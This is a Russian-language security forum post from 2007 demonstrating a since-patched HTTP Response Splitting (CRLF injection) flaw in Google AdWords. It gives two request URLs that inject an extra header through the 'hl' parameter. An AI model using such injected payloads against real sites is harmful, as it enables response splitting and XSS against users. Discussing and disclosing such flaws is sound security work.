Тема: CRLF injection
Показать сообщение отдельно

  #14  
Старый 18.04.2007, 19:42
iv.
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию

Итак, наконец нашел время для демонстрации конкретной уязвимости (уже неактуальной, пофиксена в декабре 2006) на примере Google Adwords с использованием техники HTTP Response Splitting (частный случай CRLF injection в заголовке HTTP протокола).
FYI: статья из соседнего раздела HTTP Response Splitting: разделяй и властвуй.

Подверженные атаке запросы:
Код:
https://adwords.google.com/select/ProfessionalWelcome?hl=%0D%0Afakeheader&null=Go%20HTTP/1.0
https://adwords.google.com/select/Login?hl=%0D%0Afakeheader&null=Go%20HTTP/1.0




Таким образом мы можем сформировать прозвольный второй ответ, но вот каково его реальное использование кроме всяких XSS, я что-то не соображу. =(
В багтраке лежит немало уязвимостей подобного рода кстати.